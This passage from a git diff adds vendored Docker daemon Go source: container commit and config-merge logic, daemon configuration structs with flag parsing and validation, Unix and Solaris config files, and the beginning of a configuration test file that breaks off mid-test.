= strings.ToUpper(imageEnvKey) + userEnvKey = strings.ToUpper(userEnvKey) + } + if imageEnvKey == userEnvKey { + found = true + break + } + } + if !found { + userConf.Env = append(userConf.Env, imageEnv) + } + } + } + + if userConf.Labels == nil { + userConf.Labels = map[string]string{} + } + for l, v := range imageConf.Labels { + if _, ok := userConf.Labels[l]; !ok { + userConf.Labels[l] = v + } + } + + if len(userConf.Entrypoint) == 0 { + if len(userConf.Cmd) == 0 { + userConf.Cmd = imageConf.Cmd + userConf.ArgsEscaped = imageConf.ArgsEscaped + } + + if userConf.Entrypoint == nil { + 
userConf.Entrypoint = imageConf.Entrypoint + } + } + if imageConf.Healthcheck != nil { + if userConf.Healthcheck == nil { + userConf.Healthcheck = imageConf.Healthcheck + } else { + if len(userConf.Healthcheck.Test) == 0 { + userConf.Healthcheck.Test = imageConf.Healthcheck.Test + } + if userConf.Healthcheck.Interval == 0 { + userConf.Healthcheck.Interval = imageConf.Healthcheck.Interval + } + if userConf.Healthcheck.Timeout == 0 { + userConf.Healthcheck.Timeout = imageConf.Healthcheck.Timeout + } + if userConf.Healthcheck.Retries == 0 { + userConf.Healthcheck.Retries = imageConf.Healthcheck.Retries + } + } + } + + if userConf.WorkingDir == "" { + userConf.WorkingDir = imageConf.WorkingDir + } + if len(userConf.Volumes) == 0 { + userConf.Volumes = imageConf.Volumes + } else { + for k, v := range imageConf.Volumes { + userConf.Volumes[k] = v + } + } + + if userConf.StopSignal == "" { + userConf.StopSignal = imageConf.StopSignal + } + return nil +} + +// Commit creates a new filesystem image from the current state of a container. +// The image can optionally be tagged into a repository. +func (daemon *Daemon) Commit(name string, c *backend.ContainerCommitConfig) (string, error) { + start := time.Now() + container, err := daemon.GetContainer(name) + if err != nil { + return "", err + } + + // It is not possible to commit a running container on Windows and on Solaris. 
+ if (runtime.GOOS == "windows" || runtime.GOOS == "solaris") && container.IsRunning() { + return "", fmt.Errorf("%+v does not support commit of a running container", runtime.GOOS) + } + + if c.Pause && !container.IsPaused() { + daemon.containerPause(container) + defer daemon.containerUnpause(container) + } + + newConfig, err := dockerfile.BuildFromConfig(c.Config, c.Changes) + if err != nil { + return "", err + } + + if c.MergeConfigs { + if err := merge(newConfig, container.Config); err != nil { + return "", err + } + } + + rwTar, err := daemon.exportContainerRw(container) + if err != nil { + return "", err + } + defer func() { + if rwTar != nil { + rwTar.Close() + } + }() + + var history []image.History + rootFS := image.NewRootFS() + osVersion := "" + var osFeatures []string + + if container.ImageID != "" { + img, err := daemon.imageStore.Get(container.ImageID) + if err != nil { + return "", err + } + history = img.History + rootFS = img.RootFS + osVersion = img.OSVersion + osFeatures = img.OSFeatures + } + + l, err := daemon.layerStore.Register(rwTar, rootFS.ChainID()) + if err != nil { + return "", err + } + defer layer.ReleaseAndLog(daemon.layerStore, l) + + h := image.History{ + Author: c.Author, + Created: time.Now().UTC(), + CreatedBy: strings.Join(container.Config.Cmd, " "), + Comment: c.Comment, + EmptyLayer: true, + } + + if diffID := l.DiffID(); layer.DigestSHA256EmptyTar != diffID { + h.EmptyLayer = false + rootFS.Append(diffID) + } + + history = append(history, h) + + config, err := json.Marshal(&image.Image{ + V1Image: image.V1Image{ + DockerVersion: dockerversion.Version, + Config: newConfig, + Architecture: runtime.GOARCH, + OS: runtime.GOOS, + Container: container.ID, + ContainerConfig: *container.Config, + Author: c.Author, + Created: h.Created, + }, + RootFS: rootFS, + History: history, + OSFeatures: osFeatures, + OSVersion: osVersion, + }) + + if err != nil { + return "", err + } + + id, err := daemon.imageStore.Create(config) + if err != nil 
{ + return "", err + } + + if container.ImageID != "" { + if err := daemon.imageStore.SetParent(id, container.ImageID); err != nil { + return "", err + } + } + + imageRef := "" + if c.Repo != "" { + newTag, err := reference.WithName(c.Repo) // todo: should move this to API layer + if err != nil { + return "", err + } + if c.Tag != "" { + if newTag, err = reference.WithTag(newTag, c.Tag); err != nil { + return "", err + } + } + if err := daemon.TagImageWithReference(id, newTag); err != nil { + return "", err + } + imageRef = newTag.String() + } + + attributes := map[string]string{ + "comment": c.Comment, + "imageID": id.String(), + "imageRef": imageRef, + } + daemon.LogContainerEventWithAttributes(container, "commit", attributes) + containerActions.WithValues("commit").UpdateSince(start) + return id.String(), nil +} + +func (daemon *Daemon) exportContainerRw(container *container.Container) (io.ReadCloser, error) { + if err := daemon.Mount(container); err != nil { + return nil, err + } + + archive, err := container.RWLayer.TarStream() + if err != nil { + daemon.Unmount(container) // logging is already handled in the `Unmount` function + return nil, err + } + return ioutils.NewReadCloserWrapper(archive, func() error { + archive.Close() + return container.RWLayer.Unmount() + }), + nil +} diff --git a/vendor/github.com/docker/docker/daemon/config.go b/vendor/github.com/docker/docker/daemon/config.go new file mode 100644 index 0000000000..42ef18f74a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config.go @@ -0,0 +1,525 @@ +package daemon + +import ( + "bytes" + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "runtime" + "strings" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/discovery" + "github.com/docker/docker/registry" + "github.com/imdario/mergo" + "github.com/spf13/pflag" +) + +const ( + // defaultMaxConcurrentDownloads is the default value for + // maximum number of downloads that 
+ // may take place at a time for each pull. + defaultMaxConcurrentDownloads = 3 + // defaultMaxConcurrentUploads is the default value for + // maximum number of uploads that + // may take place at a time for each push. + defaultMaxConcurrentUploads = 5 + // stockRuntimeName is the reserved name/alias used to represent the + // OCI runtime being shipped with the docker daemon package. + stockRuntimeName = "runc" +) + +const ( + defaultNetworkMtu = 1500 + disableNetworkBridge = "none" +) + +const ( + defaultShutdownTimeout = 15 +) + +// flatOptions contains configuration keys +// that MUST NOT be parsed as deep structures. +// Use this to differentiate these options +// with others like the ones in CommonTLSOptions. +var flatOptions = map[string]bool{ + "cluster-store-opts": true, + "log-opts": true, + "runtimes": true, + "default-ulimits": true, +} + +// LogConfig represents the default log configuration. +// It includes json tags to deserialize configuration from a file +// using the same names that the flags in the command line use. +type LogConfig struct { + Type string `json:"log-driver,omitempty"` + Config map[string]string `json:"log-opts,omitempty"` +} + +// commonBridgeConfig stores all the platform-common bridge driver specific +// configuration. +type commonBridgeConfig struct { + Iface string `json:"bridge,omitempty"` + FixedCIDR string `json:"fixed-cidr,omitempty"` +} + +// CommonTLSOptions defines TLS configuration for the daemon server. +// It includes json tags to deserialize configuration from a file +// using the same names that the flags in the command line use. +type CommonTLSOptions struct { + CAFile string `json:"tlscacert,omitempty"` + CertFile string `json:"tlscert,omitempty"` + KeyFile string `json:"tlskey,omitempty"` +} + +// CommonConfig defines the configuration of a docker daemon which is +// common across platforms. 
+// It includes json tags to deserialize configuration from a file +// using the same names that the flags in the command line use. +type CommonConfig struct { + AuthorizationPlugins []string `json:"authorization-plugins,omitempty"` // AuthorizationPlugins holds list of authorization plugins + AutoRestart bool `json:"-"` + Context map[string][]string `json:"-"` + DisableBridge bool `json:"-"` + DNS []string `json:"dns,omitempty"` + DNSOptions []string `json:"dns-opts,omitempty"` + DNSSearch []string `json:"dns-search,omitempty"` + ExecOptions []string `json:"exec-opts,omitempty"` + GraphDriver string `json:"storage-driver,omitempty"` + GraphOptions []string `json:"storage-opts,omitempty"` + Labels []string `json:"labels,omitempty"` + Mtu int `json:"mtu,omitempty"` + Pidfile string `json:"pidfile,omitempty"` + RawLogs bool `json:"raw-logs,omitempty"` + Root string `json:"graph,omitempty"` + SocketGroup string `json:"group,omitempty"` + TrustKeyPath string `json:"-"` + CorsHeaders string `json:"api-cors-header,omitempty"` + EnableCors bool `json:"api-enable-cors,omitempty"` + + // LiveRestoreEnabled determines whether we should keep containers + // alive upon daemon shutdown/start + LiveRestoreEnabled bool `json:"live-restore,omitempty"` + + // ClusterStore is the storage backend used for the cluster information. It is used by both + // multihost networking (to store networks and endpoints information) and by the node discovery + // mechanism. + ClusterStore string `json:"cluster-store,omitempty"` + + // ClusterOpts is used to pass options to the discovery package for tuning libkv settings, such + // as TLS configuration settings. + ClusterOpts map[string]string `json:"cluster-store-opts,omitempty"` + + // ClusterAdvertise is the network endpoint that the Engine advertises for the purpose of node + // discovery. This should be a 'host:port' combination on which that daemon instance is + // reachable by other hosts. 
+ ClusterAdvertise string `json:"cluster-advertise,omitempty"` + + // MaxConcurrentDownloads is the maximum number of downloads that + // may take place at a time for each pull. + MaxConcurrentDownloads *int `json:"max-concurrent-downloads,omitempty"` + + // MaxConcurrentUploads is the maximum number of uploads that + // may take place at a time for each push. + MaxConcurrentUploads *int `json:"max-concurrent-uploads,omitempty"` + + // ShutdownTimeout is the timeout value (in seconds) the daemon will wait for the container + // to stop when daemon is being shutdown + ShutdownTimeout int `json:"shutdown-timeout,omitempty"` + + Debug bool `json:"debug,omitempty"` + Hosts []string `json:"hosts,omitempty"` + LogLevel string `json:"log-level,omitempty"` + TLS bool `json:"tls,omitempty"` + TLSVerify bool `json:"tlsverify,omitempty"` + + // Embedded structs that allow config + // deserialization without the full struct. + CommonTLSOptions + + // SwarmDefaultAdvertiseAddr is the default host/IP or network interface + // to use if a wildcard address is specified in the ListenAddr value + // given to the /swarm/init endpoint and no advertise address is + // specified. + SwarmDefaultAdvertiseAddr string `json:"swarm-default-advertise-addr"` + MetricsAddress string `json:"metrics-addr"` + + LogConfig + bridgeConfig // bridgeConfig holds bridge network specific configuration. 
+ registry.ServiceOptions + + reloadLock sync.Mutex + valuesSet map[string]interface{} + + Experimental bool `json:"experimental"` // Experimental indicates whether experimental features should be exposed or not +} + +// InstallCommonFlags adds flags to the pflag.FlagSet to configure the daemon +func (config *Config) InstallCommonFlags(flags *pflag.FlagSet) { + var maxConcurrentDownloads, maxConcurrentUploads int + + config.ServiceOptions.InstallCliFlags(flags) + + flags.Var(opts.NewNamedListOptsRef("storage-opts", &config.GraphOptions, nil), "storage-opt", "Storage driver options") + flags.Var(opts.NewNamedListOptsRef("authorization-plugins", &config.AuthorizationPlugins, nil), "authorization-plugin", "Authorization plugins to load") + flags.Var(opts.NewNamedListOptsRef("exec-opts", &config.ExecOptions, nil), "exec-opt", "Runtime execution options") + flags.StringVarP(&config.Pidfile, "pidfile", "p", defaultPidFile, "Path to use for daemon PID file") + flags.StringVarP(&config.Root, "graph", "g", defaultGraph, "Root of the Docker runtime") + flags.BoolVarP(&config.AutoRestart, "restart", "r", true, "--restart on the daemon has been deprecated in favor of --restart policies on docker run") + flags.MarkDeprecated("restart", "Please use a restart policy on docker run") + flags.StringVarP(&config.GraphDriver, "storage-driver", "s", "", "Storage driver to use") + flags.IntVar(&config.Mtu, "mtu", 0, "Set the containers network MTU") + flags.BoolVar(&config.RawLogs, "raw-logs", false, "Full timestamps without ANSI coloring") + // FIXME: why the inconsistency between "hosts" and "sockets"? 
+ flags.Var(opts.NewListOptsRef(&config.DNS, opts.ValidateIPAddress), "dns", "DNS server to use") + flags.Var(opts.NewNamedListOptsRef("dns-opts", &config.DNSOptions, nil), "dns-opt", "DNS options to use") + flags.Var(opts.NewListOptsRef(&config.DNSSearch, opts.ValidateDNSSearch), "dns-search", "DNS search domains to use") + flags.Var(opts.NewNamedListOptsRef("labels", &config.Labels, opts.ValidateLabel), "label", "Set key=value labels to the daemon") + flags.StringVar(&config.LogConfig.Type, "log-driver", "json-file", "Default driver for container logs") + flags.Var(opts.NewNamedMapOpts("log-opts", config.LogConfig.Config, nil), "log-opt", "Default log driver options for containers") + flags.StringVar(&config.ClusterAdvertise, "cluster-advertise", "", "Address or interface name to advertise") + flags.StringVar(&config.ClusterStore, "cluster-store", "", "URL of the distributed storage backend") + flags.Var(opts.NewNamedMapOpts("cluster-store-opts", config.ClusterOpts, nil), "cluster-store-opt", "Set cluster store options") + flags.StringVar(&config.CorsHeaders, "api-cors-header", "", "Set CORS headers in the Engine API") + flags.IntVar(&maxConcurrentDownloads, "max-concurrent-downloads", defaultMaxConcurrentDownloads, "Set the max concurrent downloads for each pull") + flags.IntVar(&maxConcurrentUploads, "max-concurrent-uploads", defaultMaxConcurrentUploads, "Set the max concurrent uploads for each push") + flags.IntVar(&config.ShutdownTimeout, "shutdown-timeout", defaultShutdownTimeout, "Set the default shutdown timeout") + + flags.StringVar(&config.SwarmDefaultAdvertiseAddr, "swarm-default-advertise-addr", "", "Set default address or interface for swarm advertised address") + flags.BoolVar(&config.Experimental, "experimental", false, "Enable experimental features") + + flags.StringVar(&config.MetricsAddress, "metrics-addr", "", "Set default address and port to serve the metrics api on") + + config.MaxConcurrentDownloads = &maxConcurrentDownloads + 
config.MaxConcurrentUploads = &maxConcurrentUploads +} + +// IsValueSet returns true if a configuration value +// was explicitly set in the configuration file. +func (config *Config) IsValueSet(name string) bool { + if config.valuesSet == nil { + return false + } + _, ok := config.valuesSet[name] + return ok +} + +// NewConfig returns a new fully initialized Config struct +func NewConfig() *Config { + config := Config{} + config.LogConfig.Config = make(map[string]string) + config.ClusterOpts = make(map[string]string) + + if runtime.GOOS != "linux" { + config.V2Only = true + } + return &config +} + +func parseClusterAdvertiseSettings(clusterStore, clusterAdvertise string) (string, error) { + if runtime.GOOS == "solaris" && (clusterAdvertise != "" || clusterStore != "") { + return "", errors.New("Cluster Advertise Settings not supported on Solaris") + } + if clusterAdvertise == "" { + return "", errDiscoveryDisabled + } + if clusterStore == "" { + return "", fmt.Errorf("invalid cluster configuration. 
--cluster-advertise must be accompanied by --cluster-store configuration") + } + + advertise, err := discovery.ParseAdvertise(clusterAdvertise) + if err != nil { + return "", fmt.Errorf("discovery advertise parsing failed (%v)", err) + } + return advertise, nil +} + +// GetConflictFreeLabels validate Labels for conflict +// In swarm the duplicates for labels are removed +// so we only take same values here, no conflict values +// If the key-value is the same we will only take the last label +func GetConflictFreeLabels(labels []string) ([]string, error) { + labelMap := map[string]string{} + for _, label := range labels { + stringSlice := strings.SplitN(label, "=", 2) + if len(stringSlice) > 1 { + // If there is a conflict we will return an error + if v, ok := labelMap[stringSlice[0]]; ok && v != stringSlice[1] { + return nil, fmt.Errorf("conflict labels for %s=%s and %s=%s", stringSlice[0], stringSlice[1], stringSlice[0], v) + } + labelMap[stringSlice[0]] = stringSlice[1] + } + } + + newLabels := []string{} + for k, v := range labelMap { + newLabels = append(newLabels, fmt.Sprintf("%s=%s", k, v)) + } + return newLabels, nil +} + +// ReloadConfiguration reads the configuration in the host and reloads the daemon and server. +func ReloadConfiguration(configFile string, flags *pflag.FlagSet, reload func(*Config)) error { + logrus.Infof("Got signal to reload configuration, reloading from: %s", configFile) + newConfig, err := getConflictFreeConfiguration(configFile, flags) + if err != nil { + return err + } + + if err := ValidateConfiguration(newConfig); err != nil { + return fmt.Errorf("file configuration validation failed (%v)", err) + } + + // Labels of the docker engine used to allow multiple values associated with the same key. + // This is deprecated in 1.13, and, be removed after 3 release cycles. + // The following will check the conflict of labels, and report a warning for deprecation. 
+ // + // TODO: After 3 release cycles (1.16) an error will be returned, and labels will be + // sanitized to consolidate duplicate key-value pairs (config.Labels = newLabels): + // + // newLabels, err := GetConflictFreeLabels(newConfig.Labels) + // if err != nil { + // return err + // } + // newConfig.Labels = newLabels + // + if _, err := GetConflictFreeLabels(newConfig.Labels); err != nil { + logrus.Warnf("Engine labels with duplicate keys and conflicting values have been deprecated: %s", err) + } + + reload(newConfig) + return nil +} + +// boolValue is an interface that boolean value flags implement +// to tell the command line how to make -name equivalent to -name=true. +type boolValue interface { + IsBoolFlag() bool +} + +// MergeDaemonConfigurations reads a configuration file, +// loads the file configuration in an isolated structure, +// and merges the configuration provided from flags on top +// if there are no conflicts. +func MergeDaemonConfigurations(flagsConfig *Config, flags *pflag.FlagSet, configFile string) (*Config, error) { + fileConfig, err := getConflictFreeConfiguration(configFile, flags) + if err != nil { + return nil, err + } + + if err := ValidateConfiguration(fileConfig); err != nil { + return nil, fmt.Errorf("file configuration validation failed (%v)", err) + } + + // merge flags configuration on top of the file configuration + if err := mergo.Merge(fileConfig, flagsConfig); err != nil { + return nil, err + } + + // We need to validate again once both fileConfig and flagsConfig + // have been merged + if err := ValidateConfiguration(fileConfig); err != nil { + return nil, fmt.Errorf("file configuration validation failed (%v)", err) + } + + return fileConfig, nil +} + +// getConflictFreeConfiguration loads the configuration from a JSON file. +// It compares that configuration with the one provided by the flags, +// and returns an error if there are conflicts. 
+func getConflictFreeConfiguration(configFile string, flags *pflag.FlagSet) (*Config, error) { + b, err := ioutil.ReadFile(configFile) + if err != nil { + return nil, err + } + + var config Config + var reader io.Reader + if flags != nil { + var jsonConfig map[string]interface{} + reader = bytes.NewReader(b) + if err := json.NewDecoder(reader).Decode(&jsonConfig); err != nil { + return nil, err + } + + configSet := configValuesSet(jsonConfig) + + if err := findConfigurationConflicts(configSet, flags); err != nil { + return nil, err + } + + // Override flag values to make sure the values set in the config file with nullable values, like `false`, + // are not overridden by default truthy values from the flags that were not explicitly set. + // See https://github.com/docker/docker/issues/20289 for an example. + // + // TODO: Rewrite configuration logic to avoid same issue with other nullable values, like numbers. + namedOptions := make(map[string]interface{}) + for key, value := range configSet { + f := flags.Lookup(key) + if f == nil { // ignore named flags that don't match + namedOptions[key] = value + continue + } + + if _, ok := f.Value.(boolValue); ok { + f.Value.Set(fmt.Sprintf("%v", value)) + } + } + if len(namedOptions) > 0 { + // set also default for mergeVal flags that are boolValue at the same time. + flags.VisitAll(func(f *pflag.Flag) { + if opt, named := f.Value.(opts.NamedOption); named { + v, set := namedOptions[opt.Name()] + _, boolean := f.Value.(boolValue) + if set && boolean { + f.Value.Set(fmt.Sprintf("%v", v)) + } + } + }) + } + + config.valuesSet = configSet + } + + reader = bytes.NewReader(b) + err = json.NewDecoder(reader).Decode(&config) + return &config, err +} + +// configValuesSet returns the configuration values explicitly set in the file. 
+func configValuesSet(config map[string]interface{}) map[string]interface{} { + flatten := make(map[string]interface{}) + for k, v := range config { + if m, isMap := v.(map[string]interface{}); isMap && !flatOptions[k] { + for km, vm := range m { + flatten[km] = vm + } + continue + } + + flatten[k] = v + } + return flatten +} + +// findConfigurationConflicts iterates over the provided flags searching for +// duplicated configurations and unknown keys. It returns an error with all the conflicts if +// it finds any. +func findConfigurationConflicts(config map[string]interface{}, flags *pflag.FlagSet) error { + // 1. Search keys from the file that we don't recognize as flags. + unknownKeys := make(map[string]interface{}) + for key, value := range config { + if flag := flags.Lookup(key); flag == nil { + unknownKeys[key] = value + } + } + + // 2. Discard values that implement NamedOption. + // Their configuration name differs from their flag name, like `labels` and `label`. + if len(unknownKeys) > 0 { + unknownNamedConflicts := func(f *pflag.Flag) { + if namedOption, ok := f.Value.(opts.NamedOption); ok { + if _, valid := unknownKeys[namedOption.Name()]; valid { + delete(unknownKeys, namedOption.Name()) + } + } + } + flags.VisitAll(unknownNamedConflicts) + } + + if len(unknownKeys) > 0 { + var unknown []string + for key := range unknownKeys { + unknown = append(unknown, key) + } + return fmt.Errorf("the following directives don't match any configuration option: %s", strings.Join(unknown, ", ")) + } + + var conflicts []string + printConflict := func(name string, flagValue, fileValue interface{}) string { + return fmt.Sprintf("%s: (from flag: %v, from file: %v)", name, flagValue, fileValue) + } + + // 3. Search keys that are present as a flag and as a file option. 
+ duplicatedConflicts := func(f *pflag.Flag) { + // search option name in the json configuration payload if the value is a named option + if namedOption, ok := f.Value.(opts.NamedOption); ok { + if optsValue, ok := config[namedOption.Name()]; ok { + conflicts = append(conflicts, printConflict(namedOption.Name(), f.Value.String(), optsValue)) + } + } else { + // search flag name in the json configuration payload + for _, name := range []string{f.Name, f.Shorthand} { + if value, ok := config[name]; ok { + conflicts = append(conflicts, printConflict(name, f.Value.String(), value)) + break + } + } + } + } + + flags.Visit(duplicatedConflicts) + + if len(conflicts) > 0 { + return fmt.Errorf("the following directives are specified both as a flag and in the configuration file: %s", strings.Join(conflicts, ", ")) + } + return nil +} + +// ValidateConfiguration validates some specific configs. +// such as config.DNS, config.Labels, config.DNSSearch, +// as well as config.MaxConcurrentDownloads, config.MaxConcurrentUploads. 
+func ValidateConfiguration(config *Config) error { + // validate DNS + for _, dns := range config.DNS { + if _, err := opts.ValidateIPAddress(dns); err != nil { + return err + } + } + + // validate DNSSearch + for _, dnsSearch := range config.DNSSearch { + if _, err := opts.ValidateDNSSearch(dnsSearch); err != nil { + return err + } + } + + // validate Labels + for _, label := range config.Labels { + if _, err := opts.ValidateLabel(label); err != nil { + return err + } + } + + // validate MaxConcurrentDownloads + if config.IsValueSet("max-concurrent-downloads") && config.MaxConcurrentDownloads != nil && *config.MaxConcurrentDownloads < 0 { + return fmt.Errorf("invalid max concurrent downloads: %d", *config.MaxConcurrentDownloads) + } + + // validate MaxConcurrentUploads + if config.IsValueSet("max-concurrent-uploads") && config.MaxConcurrentUploads != nil && *config.MaxConcurrentUploads < 0 { + return fmt.Errorf("invalid max concurrent uploads: %d", *config.MaxConcurrentUploads) + } + + // validate that "default" runtime is not reset + if runtimes := config.GetAllRuntimes(); len(runtimes) > 0 { + if _, ok := runtimes[stockRuntimeName]; ok { + return fmt.Errorf("runtime name '%s' is reserved", stockRuntimeName) + } + } + + if defaultRuntime := config.GetDefaultRuntimeName(); defaultRuntime != "" && defaultRuntime != stockRuntimeName { + runtimes := config.GetAllRuntimes() + if _, ok := runtimes[defaultRuntime]; !ok { + return fmt.Errorf("specified default runtime '%s' does not exist", defaultRuntime) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/config_common_unix.go b/vendor/github.com/docker/docker/daemon/config_common_unix.go new file mode 100644 index 0000000000..ab76fe7b1b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_common_unix.go @@ -0,0 +1,90 @@ +// +build solaris linux freebsd + +package daemon + +import ( + "net" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/opts" + runconfigopts 
"github.com/docker/docker/runconfig/opts" + "github.com/spf13/pflag" +) + +// CommonUnixConfig defines configuration of a docker daemon that is +// common across Unix platforms. +type CommonUnixConfig struct { + ExecRoot string `json:"exec-root,omitempty"` + ContainerdAddr string `json:"containerd,omitempty"` + Runtimes map[string]types.Runtime `json:"runtimes,omitempty"` + DefaultRuntime string `json:"default-runtime,omitempty"` +} + +type commonUnixBridgeConfig struct { + DefaultIP net.IP `json:"ip,omitempty"` + IP string `json:"bip,omitempty"` + DefaultGatewayIPv4 net.IP `json:"default-gateway,omitempty"` + DefaultGatewayIPv6 net.IP `json:"default-gateway-v6,omitempty"` + InterContainerCommunication bool `json:"icc,omitempty"` +} + +// InstallCommonUnixFlags adds command-line options to the top-level flag parser for +// the current process that are common across Unix platforms. +func (config *Config) InstallCommonUnixFlags(flags *pflag.FlagSet) { + config.Runtimes = make(map[string]types.Runtime) + + flags.StringVarP(&config.SocketGroup, "group", "G", "docker", "Group for the unix socket") + flags.StringVar(&config.bridgeConfig.IP, "bip", "", "Specify network bridge IP") + flags.StringVarP(&config.bridgeConfig.Iface, "bridge", "b", "", "Attach containers to a network bridge") + flags.StringVar(&config.bridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs") + flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultGatewayIPv4, ""), "default-gateway", "Container default gateway IPv4 address") + flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultGatewayIPv6, ""), "default-gateway-v6", "Container default gateway IPv6 address") + flags.BoolVar(&config.bridgeConfig.InterContainerCommunication, "icc", true, "Enable inter-container communication") + flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultIP, "0.0.0.0"), "ip", "Default IP when binding container ports") + flags.Var(runconfigopts.NewNamedRuntimeOpt("runtimes", &config.Runtimes, stockRuntimeName), 
"add-runtime", "Register an additional OCI compatible runtime") + flags.StringVar(&config.DefaultRuntime, "default-runtime", stockRuntimeName, "Default OCI runtime for containers") + +} + +// GetRuntime returns the runtime path and arguments for a given +// runtime name +func (config *Config) GetRuntime(name string) *types.Runtime { + config.reloadLock.Lock() + defer config.reloadLock.Unlock() + if rt, ok := config.Runtimes[name]; ok { + return &rt + } + return nil +} + +// GetDefaultRuntimeName returns the current default runtime +func (config *Config) GetDefaultRuntimeName() string { + config.reloadLock.Lock() + rt := config.DefaultRuntime + config.reloadLock.Unlock() + + return rt +} + +// GetAllRuntimes returns a copy of the runtimes map +func (config *Config) GetAllRuntimes() map[string]types.Runtime { + config.reloadLock.Lock() + rts := config.Runtimes + config.reloadLock.Unlock() + return rts +} + +// GetExecRoot returns the user configured Exec-root +func (config *Config) GetExecRoot() string { + return config.ExecRoot +} + +// GetInitPath returns the configure docker-init path +func (config *Config) GetInitPath() string { + config.reloadLock.Lock() + defer config.reloadLock.Unlock() + if config.InitPath != "" { + return config.InitPath + } + return DefaultInitBinary +} diff --git a/vendor/github.com/docker/docker/daemon/config_experimental.go b/vendor/github.com/docker/docker/daemon/config_experimental.go new file mode 100644 index 0000000000..963a51e5a3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_experimental.go @@ -0,0 +1,8 @@ +package daemon + +import ( + "github.com/spf13/pflag" +) + +func (config *Config) attachExperimentalFlags(cmd *pflag.FlagSet) { +} diff --git a/vendor/github.com/docker/docker/daemon/config_solaris.go b/vendor/github.com/docker/docker/daemon/config_solaris.go new file mode 100644 index 0000000000..bc18ccd7e4 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_solaris.go @@ -0,0 +1,47 @@ +package 
daemon + +import ( + "github.com/spf13/pflag" +) + +var ( + defaultPidFile = "/system/volatile/docker/docker.pid" + defaultGraph = "/var/lib/docker" + defaultExec = "zones" +) + +// Config defines the configuration of a docker daemon. +// These are the configuration settings that you pass +// to the docker daemon when you launch it with say: `docker -d -e lxc` +type Config struct { + CommonConfig + + // These fields are common to all unix platforms. + CommonUnixConfig +} + +// bridgeConfig stores all the bridge driver specific +// configuration. +type bridgeConfig struct { + commonBridgeConfig + + // Fields below here are platform specific. + commonUnixBridgeConfig +} + +// InstallFlags adds command-line options to the top-level flag parser for +// the current process. +func (config *Config) InstallFlags(flags *pflag.FlagSet) { + // First handle install flags which are consistent cross-platform + config.InstallCommonFlags(flags) + + // Then install flags common to unix platforms + config.InstallCommonUnixFlags(flags) + + // Then platform-specific install flags + config.attachExperimentalFlags(flags) +} + +func (config *Config) isSwarmCompatible() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/config_test.go b/vendor/github.com/docker/docker/daemon/config_test.go new file mode 100644 index 0000000000..90f6a1277f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_test.go @@ -0,0 +1,229 @@ +package daemon + +import ( + "io/ioutil" + "os" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/testutil/assert" + "github.com/spf13/pflag" +) + +func TestDaemonConfigurationNotFound(t *testing.T) { + _, err := MergeDaemonConfigurations(&Config{}, nil, "/tmp/foo-bar-baz-docker") + if err == nil || !os.IsNotExist(err) { + t.Fatalf("expected does not exist error, got %v", err) + } +} + +func TestDaemonBrokenConfiguration(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") 
+ if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"Debug": tru`)) + f.Close() + + _, err = MergeDaemonConfigurations(&Config{}, nil, configFile) + if err == nil { + t.Fatalf("expected error, got %v", err) + } +} + +func TestParseClusterAdvertiseSettings(t *testing.T) { + if runtime.GOOS == "solaris" { + t.Skip("ClusterSettings not supported on Solaris\n") + } + _, err := parseClusterAdvertiseSettings("something", "") + if err != errDiscoveryDisabled { + t.Fatalf("expected discovery disabled error, got %v\n", err) + } + + _, err = parseClusterAdvertiseSettings("", "something") + if err == nil { + t.Fatalf("expected discovery store error, got %v\n", err) + } + + _, err = parseClusterAdvertiseSettings("etcd", "127.0.0.1:8080") + if err != nil { + t.Fatal(err) + } +} + +func TestFindConfigurationConflicts(t *testing.T) { + config := map[string]interface{}{"authorization-plugins": "foobar"} + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + flags.String("authorization-plugins", "", "") + assert.NilError(t, flags.Set("authorization-plugins", "asdf")) + + assert.Error(t, + findConfigurationConflicts(config, flags), + "authorization-plugins: (from flag: asdf, from file: foobar)") +} + +func TestFindConfigurationConflictsWithNamedOptions(t *testing.T) { + config := map[string]interface{}{"hosts": []string{"qwer"}} + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + var hosts []string + flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, opts.ValidateHost), "host", "H", "Daemon socket(s) to connect to") + assert.NilError(t, flags.Set("host", "tcp://127.0.0.1:4444")) + assert.NilError(t, flags.Set("host", "unix:///var/run/docker.sock")) + + assert.Error(t, findConfigurationConflicts(config, flags), "hosts") +} + +func TestDaemonConfigurationMergeConflicts(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"debug": true}`)) 
